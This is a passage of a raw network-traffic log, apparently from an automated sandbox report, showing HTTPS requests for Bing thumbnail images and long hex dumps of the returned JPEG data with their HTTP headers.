                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: e6 f9 2f e6 af fc b0 4e fb 7f da fe 2a f2 fb 5f 10 ea 5a 66 87 2f f6 45 e6 b9 6f f6 89 3f d2 7c dd 41 e6 fb 47 fb cb fd 6b 92 d6 3c 43 ae cb a8 48 ef 34 de 65 c7 ef 3c c9 65 f9 e4 ff 00 7d bf 8a b3 94 dc 96 86 8e a2 b6 c6 f6 b9 e3 6f 1b ea 7f e8 ba a6 bd 34 96 bf f3 cb e7 74 ff 00 ec aa ac 9e 23 9d 3c 3d 63 a2 69 da 6e 9f 1c 16 57 33 5c 49 73 f6 4f f4 9b 87 93 fe 7a c9 fd d5 fe 15 ac 19 f5 3d 4a e2 1d ef 34 d2 53 a4 69 1f ef f9 31 c9 ff 00 3d 2a 1b 48 ca cf b9 04 93 ce f3 6c 9f c9 f2 ed e3 ff 00 96 bf fb 2d 4f 75 7d 1c b3 49 f6 5f dd c7 1d b7 ff 00 b5 54 f5 85 8e 29 bc f4 9b cc f2 ff 00 e7 ad 45 e6 f9 b0 f9 fe 4f ef 2a 6d 19 15 cc d3 2f c9 73 3f 93 fb ff 00 26 88 3c fb d9 bf b3 ac 66 fd fd cc 9e 5f fb 1f f0 2a a1 3c 17 09 f7 3f 79 3c 9f ea eb ad f8 51 e1
                                                                                                                                                                                                                                                                                                Data Ascii: /N*_Zf/Eo?|AGk<CH4e<e}o4t#<=cinW3\IsOz=J4Si1=*Hl-Ou}I_T)EO*m/s?&<f_*<?y<Q
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 47 13 f9 51 c5 12 3c d7 6f fd ed 8d f7 23 ff 00 6a b0 76 5a 4e ec bf 6b ed 5d a9 24 9f dc cf 41 d7 3f 68 2f 16 78 b7 c4 3f d8 3a 26 9b e1 ff 00 0c e9 df eb ef 6e 6c ad 3e 7b 7b 75 fb ed be bc af e2 8f c6 63 7b e2 2f 3b c3 de 54 90 47 17 91 1f da 61 df f7 6b 77 c6 1f 0a 76 78 3a e6 d7 c2 9e 30 b4 bd fb 6d cf fa 4f 9b 16 c9 ae 36 fd d8 fe 5a e3 3e 16 68 1a 97 84 b5 ab 9d 75 be cb 24 d6 71 ec 8e 48 e2 f3 be c9 bb fe 5a 7c df 75 ab 5f dd 24 e6 96 ca df f0 e6 15 aa d7 8a 50 9b d3 76 cd cf 0d 6a 1f 1d f5 2d 3a e6 e7 4e f0 a9 b7 d3 ee 23 f2 cd cc 96 bf 64 44 5f f6 64 72 b5 8a 6c fc 41 69 ae 5b 3e a6 74 ab 78 3c d4 f3 7e cd 75 e6 cd 53 f8 bb c7 57 1a 97 fc 85 26 96 49 24 93 f7 92 79 ce ef 26 df ef 33 d7 29 6b a8 5d de ea 12 22 4d fb cf f9 e7 5c d4 eb d5 72 6e 11
                                                                                                                                                                                                                                                                                                Data Ascii: GQ<o#jvZNk]$A?h/x?:&nl>{{uc{/;TGakwvx:0mO6Z>hu$qHZ|u_$Pvj-:N#dD_drlAi[>tx<~uSW&I$y&3)k]"M\rn
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: fa 24 df 67 82 df f7 97 3a 94 51 7e fa 34 5f e1 46 6f b9 fe f5 6d 78 9b c6 da 2e 8f 35 8e 91 e0 db 39 a4 b5 ff 00 8f 79 23 b6 fb f7 1f ef cd d3 77 fb 9f 2d 6c 6b ff 00 0a fc 43 17 99 a7 78 6a f3 49 b8 b1 b8 ff 00 59 e6 cb e4 fc 8b f7 7c c5 e6 b4 2c 7e 14 eb 56 fa 7c 7a 5d 94 da 7c 76 9e 57 99 24 51 5d ff 00 cb 5f ef a6 e5 aa a9 85 ad 7e 67 06 ca c3 e2 b0 e9 72 46 69 79 ff 00 91 ca 47 af 69 be 1c d5 a4 ba fe cd fb 6d d6 a3 1f fc 7b 4b 77 bf fe fb fe 2d ab fc 31 d1 6a de 1a 96 ee db 5b f1 7d e5 de ab 25 c4 9e 67 f6 4d b7 c9 fe e7 98 df f3 cf fd 88 ea d6 a5 f0 63 c6 69 77 be 08 6d 24 ff 00 a6 9f 6b 4f de 7f b5 fe cd 6c f8 67 c3 5f 10 b4 4d 42 4b ad 07 c2 ba 7d 95 d4 91 fd 9e 4b 9b 9d 41 2f 3c b8 bf bb 16 ef f5 6a d5 8c b0 98 84 af 08 be 67 f2 1a c6 50 6d a9
                                                                                                                                                                                                                                                                                                Data Ascii: $g:Q~4_Fomx.59y#w-lkCxjIY|,~V|z]|vW$Q]_~grFiyGim{Kw-1j[}%gMciwm$kOlg_MBK}KA/<jgPm
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16067INData Raw: df d4 a9 a3 82 48 a1 8d d2 1b b9 3f e9 9f 9b 5e a9 1f c1 7f 1f 7d f1 17 d9 e1 93 fe 5a 5c ec 4f fd 09 aa ae b9 f0 83 c6 fa 6e 93 73 a8 4f 79 a7 dc 7d 9f fe 5d bf b4 13 ce 93 fe f8 ac e5 88 a6 96 e6 91 c0 56 6d 24 b7 38 68 2e f5 af b2 7e e2 1d 42 38 ff 00 e9 9e ca 7d ad cc 7e 6f 9f 7b 36 a1 1c 9f f4 d6 5d 9f f8 ed 43 77 f0 5b e2 fe a7 34 9a 8d d5 9f 97 1c 72 7e ef cd d5 93 ff 00 21 aa 9a 9b e1 7f c1 df 8b f6 9e 26 b6 4d 6e f2 1b dd 36 f6 e7 cb b9 8f cd 79 93 e6 4f ef ff 00 0d 71 c7 30 72 7f c3 69 1e c4 f2 49 c6 2a d5 6e ff 00 0f be e7 41 1d f7 86 a2 9a 3d fa 95 dc 7f f6 f7 5d 1e 9b e3 ab 44 9a 38 34 eb cf 2e 78 ff 00 e5 a7 9b bf fe 05 b2 a8 6a bf 0a fc 77 6f a7 5c c1 0e 8f a1 ea 37 de 67 fa 34 96 d7 7f ea d3 fe 9a 46 ff 00 fc 55 79 1f c6 5f ed 2f 0a f8 9a
                                                                                                                                                                                                                                                                                                Data Ascii: H?^}Z\OnsOy}]Vm$8h.~B8}~o{6]Cw[4r~!&Mn6yOq0riI*nA=]D84.xjwo\7g4FUy_/
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: ea 57 a2 0d 3f c4 36 ff 00 7f c9 92 3f fa 67 5a f6 b1 6a 49 e5 bb d9 c3 e6 7f d3 5a 1b b1 71 8a 7f 65 98 73 69 93 bc 3b 1f ce 92 3f fa 6b 2d 13 e8 b1 c5 69 ff 00 1f 93 7f d7 3a dc bb 8b 5a fb e9 0d a4 75 5e 4b 6d 4e 58 7e 7f b2 52 dc 6e 0a fb 33 97 8e 09 2d 3f e9 a4 7f f5 ca a5 9e 08 ee 21 de f6 73 49 ff 00 4c fc dd 95 d5 ff 00 66 41 fc 73 45 e6 7f d3 29 6a ac f0 40 93 6f fb 64 d1 ff 00 d7 5a 69 dc 9f 66 d1 cd cf a7 bd bd a7 da a0 fe d0 8f fe 99 f9 bf 25 63 df 6b 9a b5 bc db 1f 47 f3 13 fe b9 57 5f 75 ad 69 b6 5f eb f5 2a 20 f1 0f 85 ae 21 fd fe a5 15 1f 23 3f 67 16 ed cc 91 c6 c9 14 f7 1f e9 5e 77 d9 e4 ff 00 9e 7e 55 5a 82 2d 69 e1 df 06 b1 e6 47 ff 00 3c fc aa eb 6d 6f 3c 35 71 77 fb 8d 4a d2 89 e4 d3 7c ef f5 d0 ff 00 df aa 61 ec 92 5f 12 39 c4 fe d2
                                                                                                                                                                                                                                                                                                Data Ascii: W?6?gZjIZqesi;?k-i:Zu^KmNX~Rn3-?!sILfAsE)j@odZif%ckGW_ui_* !#?g^w~UZ-iG<mo<5qwJ|a_9
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: b4 b1 3d c4 36 f2 ef fb 8c df eb 36 7f b7 fc 35 eb f2 78 77 c4 3a d6 ad f6 ab 29 b4 fb 2d 2b cb f2 ee 6d a4 f9 ee 7f ef e7 f0 d2 c1 f0 e7 45 4d 42 39 f4 ef b5 c7 3c 72 7f ac f3 7f f4 15 af 99 c5 63 f1 18 ab fd 63 54 fa 23 eb 29 e5 38 4a 09 47 0f ee b5 d5 ee 79 ec fa ac 7a af fa 2d d7 fa 3c 92 47 f6 8b 68 fc d4 74 b8 8b fb d1 bf dd 74 ab 17 da bf d9 21 93 ed be 4c 7f bb fd e7 95 f3 f9 69 fd d5 ab 1e 3e f0 7f 8b fc 3b a7 ea 42 cb c4 7a 7d e6 8f 24 9f 68 93 4a d4 b6 79 d0 7f 7d ed 2e 36 ff 00 a3 bb 77 fe 1a e2 3c 1d a9 68 da dd 9d ca 59 6a 31 5c 7d 8f 67 da 7e dd f2 5c 5b ff 00 d7 48 ff 00 bb fe da 7c 95 e6 bc 22 8c 79 e0 ef 15 f8 15 3c 4d 48 cf 92 a4 6c de cf a3 3a 5d 1f 48 d2 6e f5 69 35 1d 13 4d 9a e2 48 ff 00 e5 e6 e7 e4 f2 df fd ea d2 ba 82 c2 5f 91 ef
                                                                                                                                                                                                                                                                                                Data Ascii: =665xw:)-+mEMB9<rccT#)8JGyz-<Ghtt!Li>;Bz}$hJy}.6w<hYj1\}g~\[H|"y<MHl:]Hni5MH_


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                17192.168.2.649751150.171.27.10443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:15 UTC346OUTGET /th?id=OADD2.10239317301631_1JS0AMCX251CLJ5OX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 640791
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: E343A48FC343443387A713A0A3137A6F Ref B: EWR30EDGE1609 Ref C: 2024-12-20T06:31:15Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:15 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1a 22 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 32 3a 30 38 3a 30 34 20 31 39 3a 35 32 3a 33 37 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                                                Data Ascii: JFIF``"ExifMM*bj(1r2i``Adobe Photoshop 23.4 (Windows)2022:08:04 19:52:378
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 77 da 7c 6f 0d 10 c5 bb 84 f0 a9 ad 8f 27 92 0d 93 6c 7a 9b c8 df f7 2b a5 d7 34 5d 93 6f 48 6a ad ad 8f f0 57 7a ac 9a bd ce 1f 60 d3 b5 8c 48 2d a4 49 ab 5a c5 64 7f f9 63 5a d0 58 c6 9f 7e ad 47 04 69 f7 2b 29 57 4f 73 6a 74 1a d8 ce fb 34 7e 4d 55 9e 28 d2 b6 67 4a ab 1d b6 f9 ab 35 3e e6 8e 9f 62 85 a4 52 79 d5 bd 62 d4 d8 ec f6 54 be 56 ca 99 cd 48 a8 41 c7 71 d3 fc f5 97 75 04 95 a9 e5 3d 10 41 fd fa 88 cb 95 97 28 36 8c 98 d6 7f e0 ad 4d 36 09 3f 8e af 47 6d 1d 4d 1c 5b 2a 67 5a eb 42 e3 49 a7 71 d0 25 58 91 68 8d 76 50 f5 c8 e4 74 14 ae a2 df 59 73 c7 1f 9d 5a 37 d3 d5 1d d5 b5 3b d8 ce 43 3c a8 ea 29 e2 8e 9d 24 f5 1e ed f5 a2 6c 8b 14 a7 8e a9 48 b5 7e 7a a7 71 57 72 6c 41 4d e6 9c f4 de 6a 59 48 39 a4 8e 97 9a 39 a4 31 d4 53 37 d1 be 93 76 1a
                                                                                                                                                                                                                                                                                                Data Ascii: w|o'lz+4]oHjWz`H-IZdcZX~Gi+)WOsjt4~MU(gJ5>bRybTVHAqu=A(6M6?GmM[*gZBIq%XhvPtYsZ7;C<)$lH~zqWrlAMjYH991S7v
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: f5 1c 8b 4c 86 ac 55 91 69 bc d5 99 16 a2 f2 ea d3 b9 0d 15 e8 ab 1b 68 db 4c 56 2b d1 b6 a6 da 69 db 68 41 62 be da 36 d5 8d b4 ed b4 ee 16 20 f2 a8 f2 aa 7d b4 6d a2 e1 62 b7 95 4e f2 aa 7d b4 fd 94 5c 2c 57 f2 a9 fb 6a 5d 94 6c a4 16 22 db 4f f2 aa 5d a6 8d a6 82 ac 43 b6 9f b2 9f b4 d3 b6 d0 31 b4 53 b6 d6 6f 8b b5 39 f4 7d 0e 4d 52 0b 3f b6 fd 9f f7 92 47 e6 ec f9 28 06 d2 57 65 dd 94 bc d6 7f 84 75 7f ed df 0f 5b 6a 9f 63 9a cb ed 1f f2 ed 2f df 8f fd ea d0 e6 80 4d 35 74 46 f4 da 74 8b 44 71 50 48 dd b4 da 9f ca a8 35 26 92 d3 4f 92 e9 2c e6 b8 f2 e3 f3 3e cd 6d f7 e4 ff 00 65 68 02 1b a9 e3 b7 86 49 e7 9a 18 e0 8e 3f 32 49 25 fb 91 d7 03 ac 7c 64 f0 85 bc d2 25 97 f6 8e ab 24 7f f2 d2 da 1f 93 7f f7 77 57 1b ae 78 87 c4 3f 10 35 0b ed 3b 51 86 6d
                                                                                                                                                                                                                                                                                                Data Ascii: LUihLV+ihAb6 }mbN}\,Wj]l"O]C1So9}MR?G(Weu[jc/M5tFtDqPH5&O,>mehI?2I%|d%$wWx?5;Qm
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 5d 94 76 d6 9f 69 ff 00 48 6f 95 7e e7 2d 5d c7 85 74 ab bb 7b 4b 6d 47 51 f3 a4 f1 1e a3 22 49 f6 28 a2 f9 ec 2d e3 4d a9 e6 33 7f ab fe f7 fb 35 c9 8c c5 42 8d 27 14 ed d0 f5 f2 ac be ad 7a d1 75 3a 6a fe 5f ab e8 6b 78 c3 fb 27 58 f1 65 f6 a1 ad 43 a8 5e 5a 59 db 25 a7 d9 a2 97 64 31 ec fb b0 ee fe fc 9f dd fe ed 6c d8 f8 6b 52 b2 d2 63 ba 9e 68 ac b5 19 37 dc 5b 69 d6 30 a7 dd ff 00 7b fe 59 af a7 e6 6b 80 d6 35 ad 35 f4 fb 6d 21 26 d3 e4 92 39 1f cc bd f9 de 18 ee 19 ff 00 e5 8b 37 0f 2b f7 7a b5 a9 78 8e ed 3c 33 e4 26 a5 e5 cf 24 9f bc b9 96 5f 9e e3 fb ab bb da be 66 a2 a9 18 2f 3d 8f b8 a0 e9 4e b4 af 6b 2d ec 76 1a e6 87 e1 3d 37 c3 db 23 86 1b 39 ae 6e 7f 79 6d 63 f2 26 ff 00 e3 69 3f 8a 4f 77 6a f1 dd 73 c4 7a 17 fc 26 5a 4d 94 10 c3 71 6b e6
                                                                                                                                                                                                                                                                                                Data Ascii: ]viHo~-]t{KmGQ"I(-M35B'zu:j_kx'XeC^ZY%d1lkRch7[i0{Yk55m!&97+zx<3&$_f/=Nk-v=7#9nymc&i?Owjsz&ZMqk
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: b5 26 f3 3c cf fc 88 ff 00 ed 56 36 87 a9 cf 77 77 23 ea 33 43 a7 27 97 e5 c7 24 b2 ef f3 3f da 54 ac 30 f5 2a 2d 74 69 76 3d 3c 5c 29 3f 75 5d 37 df 63 b4 f0 ae ab 02 6a d7 c9 04 33 7d 96 ca d9 3f 77 17 c9 f7 bf 8a b9 ad 37 57 8f 5b 87 4d 7b 5b 3f f4 ab 89 1e de 5b d8 be fc 9b 5d fe f5 65 f8 9b c4 73 e8 9f da c8 ff 00 eb 24 d3 5e e2 38 ee 65 d9 f7 7f 8b e5 af 32 d5 3c 77 6b a5 fc 38 d3 74 8d 40 4d 1d a4 91 7e f6 e6 da 5f f4 89 e5 fb df 25 7b f8 5c 2b ad 4d aa 8a f1 d2 df a9 f2 b8 fc c9 61 e4 9d 29 5a 5a df f4 3e 96 f0 5e 8b 7f aa ea d2 fd 8b c9 8e d6 de 3f de 49 14 a8 ff 00 3b 57 55 f1 a6 c1 f4 af 83 b7 df be 96 44 f2 ff 00 e5 94 bb 2b c2 be 06 fc 51 d6 b4 1f 01 f9 da 5f 82 74 ed 3a 0b 8b 9f f5 9a be ad e4 bd df f7 5b 6e dd ed 5d 07 c7 0f 1e 7c 49 f1 af
                                                                                                                                                                                                                                                                                                Data Ascii: &<V6ww#3C'$?T0*-tiv=<\)?u]7cj3}?w7W[M{[?[]es$^8e2<wk8t@M~_%{\+Ma)ZZ>^?I;WUD+Q_t:[n]|I
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 5d 49 fc bb 5f b6 4b 71 27 97 e6 7f aa ff 00 58 ec ff 00 75 6b 53 e2 16 af fd 89 e1 3b 6b 57 86 ee 44 b8 8f cc f2 e2 bb f9 23 95 7e f7 99 ba bc ee c7 5c bb 7d 5b ec 5a 75 9c da 8c 96 f1 a7 d9 bc dd e9 e5 ba fc fb a4 fe fd 64 eb 1a 8d df 88 35 68 ec b5 bd 7b fe 5a 7e f2 48 a2 f9 23 7f ef 7c bf 7d aa a3 83 52 9a ba d1 0a 58 e6 a9 cb 5b b7 b1 ad a8 f8 b3 c4 29 f6 67 9e 18 63 8f cb 4b 8b 69 7c af 9f 67 f0 fc fd 6b 2e 7b ef 36 ef fd 74 d2 47 27 fa cf b4 ff 00 cb 4f f7 b6 d5 39 f4 e9 ee f5 0f b1 5a f9 d7 b2 7c 96 f6 51 fc ef f2 2f f7 17 f8 9b ff 00 1d ae 96 d7 48 b4 d2 b4 fb eb ab db cb b8 ee a3 df 1f 97 2c 5b 26 8f ff 00 65 af 42 2a 94 2d 1b 6a 79 ea 55 6a b6 ef a2 27 d2 75 38 2e 3c 33 7d 6a 93 7f c7 bc 69 1f ee a2 d8 9f 37 fa ca c4 d1 f5 39 2d f5 6b e7 48 7f
                                                                                                                                                                                                                                                                                                Data Ascii: ]I_Kq'XukS;kWD#~\}[Zud5h{Z~H#|}RX[)gcKi|gk.{6tG'O9Z|Q/H,[&eB*-jyUj'u8.<3}ji79-kH
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: df fd 9b ff 00 6d 22 96 bb 8b ad 33 7f cf fb ef fa e7 54 ae ac 6f d3 e4 82 1f fc 8b 4f 99 13 2c 3a be c7 1b 63 3c 6d f2 25 9c 32 7f e3 95 af 6b 14 1e 76 cf 3a 68 ff 00 e7 a7 ef 6b 47 fb 2b 67 fc 7e c3 ff 00 5d 2a 09 ec e3 49 b7 c1 0f 97 1d 09 a6 67 ec e5 14 49 26 9f 04 bf 3b de 5d f9 7f f2 d3 f7 b4 db ad 06 c1 fe 74 f1 25 dc 7f f4 cf ed 74 27 cf f7 21 9a 49 2a d4 1a 7c 0f f3 fd 8f ec f2 51 cc cd 94 13 e8 55 92 2d 6a 2f 2f fe 26 53 49 1f fd 72 4a 2d 67 9e 2f bf 37 99 ff 00 6c aa e4 96 71 ff 00 cf 1f fc 8b 54 6e f4 fd 4b ce df 04 30 fe f2 98 9c 5a 1d 3e a1 03 cd b1 21 86 49 3f eb 95 45 1f db e5 87 fd 77 97 27 fd 72 aa 5e 46 ac 93 6c 78 7c bf fb ee ae c1 04 8f f7 e1 86 49 3f eb ab d0 66 a4 fa a2 58 e0 9e 28 7e 7d 4a 1f fb f5 55 6e a2 bf f3 be 49 a1 ab 17 50
                                                                                                                                                                                                                                                                                                Data Ascii: m"3ToO,:c<m%2kv:hkG+g~]*IgI&;]t%t'!I*|QU-j//&SIrJ-g/7lqTnK0Z>!I?Ew'r^Flx|I?fX(~}JUnIP
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16067INData Raw: fb c9 65 fe f5 5d f0 e6 b5 a1 59 5d c8 fa a4 33 49 04 9f f2 cf ef a4 7b ab c7 49 c5 de d7 3d c8 34 df 2b 95 bb 7e 85 dd 1e fb ed 13 7d 96 09 be d1 f6 8f f9 eb 2e c7 ab d2 2d df 9d e4 5a c3 e6 79 7f eb 3f 7d fe af fd 9d d5 83 e2 0b 18 d3 f7 fe 17 9b cb f3 37 ff 00 a3 7f 1c 69 fe cf d6 b1 34 dd 7e 4b 49 a4 d3 b5 1f 3a 3f fb 63 ff 00 8f 3d 5f b3 52 57 89 d9 f5 ae 47 cb 53 ef e8 6c f8 c6 fb 45 4b 48 f4 4b df 3a de 4b 8d 9f bb fb f3 49 ba b5 b4 7b 9d 69 2e e3 d9 0d a5 bc 71 ff 00 d3 5f 9e 34 ff 00 e2 ab 1f 4a fb 24 ba 87 91 07 93 24 11 fe f2 e6 e6 58 be 7b b7 ff 00 a6 55 b7 a6 db 68 b2 cd 1a 27 9d e5 c9 1b ff 00 d3 14 ff 00 81 d2 9c ac b9 6d 7f c4 74 e2 e7 37 2b af 91 15 8e ab 69 71 ae 6c d2 ef 26 d4 67 8e 37 ff 00 6d e3 ff 00 77 77 0b 5b de 1f d5 ee e5 ff 00
                                                                                                                                                                                                                                                                                                Data Ascii: e]Y]3I{I=4+~}.-Zy?}7i4~KI:?c=_RWGSlEKHK:KI{i.q_4J$$X{Uh'mt7+iql&g7mww[
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: c9 3c a8 52 de da dd 17 f0 ad 69 ef 34 5b 2f 33 4e d3 a6 86 3b ab 88 ff 00 79 73 ff 00 d9 56 5d f7 85 7c 37 e2 0d 3e 38 f5 4b bf dc 7c 92 7d 9a c6 6d 89 ff 00 02 db f7 96 b8 9f 89 5e 00 9e ef 4f f2 3c 3d e2 4b 4b 28 3f e5 a5 b4 b2 fc f2 7f db 6f fd 96 bc 8a 3c 8d da 4e c7 d6 54 95 7a 70 7c b0 52 b7 67 6b fc 8b 5e 38 f1 0e 8a 9a 4c 8f 3e a5 77 e5 c7 fe b2 48 ab e6 cf 8f 1a 8d 86 b1 6b 6d 7b 0e 64 9e 39 3c bf 32 4f ee ff 00 76 ba 2d 72 c7 ec fa 7d cd 95 d5 e4 de 7c 7f f2 ce 5f b9 5e 61 e2 69 cf 97 22 4d f7 3f e5 95 7d 2e 5f 87 8d 39 5d 33 e1 73 ac c2 75 e0 e1 38 a4 73 bb 6a f6 8d a5 6a 1a ae a1 1d 9e 9d 69 35 c4 f2 7f ab 8e 3f bf 54 63 6f ef d7 bf 7e cd 5a 64 1a 4f 86 7f b4 ee a2 86 3b ad 56 4f 2e 39 65 ff 00 96 71 7f f5 eb d2 c6 e2 be ad 4b 9d 2b b3 e7 b0
                                                                                                                                                                                                                                                                                                Data Ascii: <Ri4[/3N;ysV]|7>8K|}m^O<=KK(?o<NTzp|Rgk^8L>wHkm{d9<2Ov-r}|_^ai"M?}._9]3su8sjji5?Tco~ZdO;VO.9eqK+
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: ac fa 69 e8 7b 94 70 f1 5f 16 af cc b4 f2 58 24 b2 3d ed e4 b7 0f ff 00 2d 3c c9 77 f9 75 c2 78 fe db 42 8a 69 35 18 7c 9f b5 49 27 fc bc cb fc 1f e7 f8 6b 6f ec 72 7f af 79 be cf 6b 27 fa cf e0 ff 00 2d 5c 97 8b b4 1b 49 61 8e f7 ce fe ce f2 f7 c7 17 ef 7f e5 97 f7 3f da ab a1 55 73 ea 18 aa 72 54 9f 22 38 5b eb cf 36 6f 23 57 d4 a6 fb 2f 98 f2 5b 5b 7d c4 8e b9 3f 1f ea 1b fc bb 28 26 f3 20 8e 4f 33 fe 9b 6f ff 00 7e 9d f1 42 28 f4 cd 42 3b 5d 3a f2 5b d9 3c bf f4 9f 37 7b bc 75 c5 dd 34 97 b3 6f f2 7c cf f9 e7 25 7b d4 a9 25 69 c7 63 e2 f1 78 99 ae 6a 52 5a 9e f9 f0 bb 5e b4 f1 1f 84 fe c5 e4 cd fd b1 1c 6f 25 ef da 7f e5 ef 6f f1 47 b7 f8 6a 9d f7 91 77 f2 6a f3 43 1c 1e 6f fc 79 5b 6f df fe ca 7c b5 e1 9a 6e ab a9 68 9e 21 b6 d5 2c b5 29 ac a7 b7 93
                                                                                                                                                                                                                                                                                                Data Ascii: i{p_X$=-<wuxBi5|I'koryk'-\Ia?UsrT"8[6o#W/[[}?(& O3o~B(B;]:[<7{u4o|%{%icxjRZ^o%oGjwjCoy[o|nh!,)


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                18192.168.2.649752150.171.27.10443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:15 UTC346OUTGET /th?id=OADD2.10239381795371_1OWBWRW5WQA079L9Q&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 895462
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: 48DC614D16334645B84C1F67E3B73E41 Ref B: EWR30EDGE0110 Ref C: 2024-12-20T06:31:16Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:15 GMT
                                                                                                                                                                                                                                                                                                Connection: close
